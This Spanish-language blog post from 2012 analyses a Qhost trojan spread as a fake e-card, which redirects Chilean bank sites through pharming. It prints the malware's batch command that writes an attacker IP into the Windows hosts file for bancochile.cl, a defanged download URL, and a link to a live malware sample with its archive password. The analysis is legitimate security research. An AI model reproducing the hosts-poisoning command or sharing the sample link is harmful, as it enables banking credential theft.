miércoles, 29 de agosto de 2012


Qhost: Amor en Linea - postal de Cinthia Rojas‏.


Hoy les traigo un simple, pero efectivo, troyano Qhost. Siempre utilizando la ingeniería social como elemento principal para la infección de las victimas
En este caso afecta a varios sitios populares de Internet y entidades bancarias de Chile.


Link:
hxxp://184.82.146.86/gusanito/esp/tarjetas/postales/amistad/postal_gusanito.exe


Este nos descarga a un ejecutable que esta compactado con UPX


Descomprimimos fácilmente con UPX -d archivo.exe

Y a simple vista con un editor Hexadecimal podemos observar el Pharming.


Por lo que se observa el troyano genera un archivo .bat para luego con el, hacer un inclusión de lineas al archivo .hosts

echo 184.82.146.86 http://bancochile.cl >> %windir%\system32\drivers\etc\hosts

(En la imagen puede verse los sitios afectados por el troyano)


Luego de la modificación del archivo host, abre una web de gusanito.com para despistar

start http://www.gusanito.com/esp/tarjetas/postales/amistad/faltas_sobre_la_arena/937



Muestra (original + sin UPX) http://www.mediafire.com/?yklxyexzch4c5vg
Password = infected



Es todo por el momento.


@Dkavalanche  2012





No hay comentarios:

 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!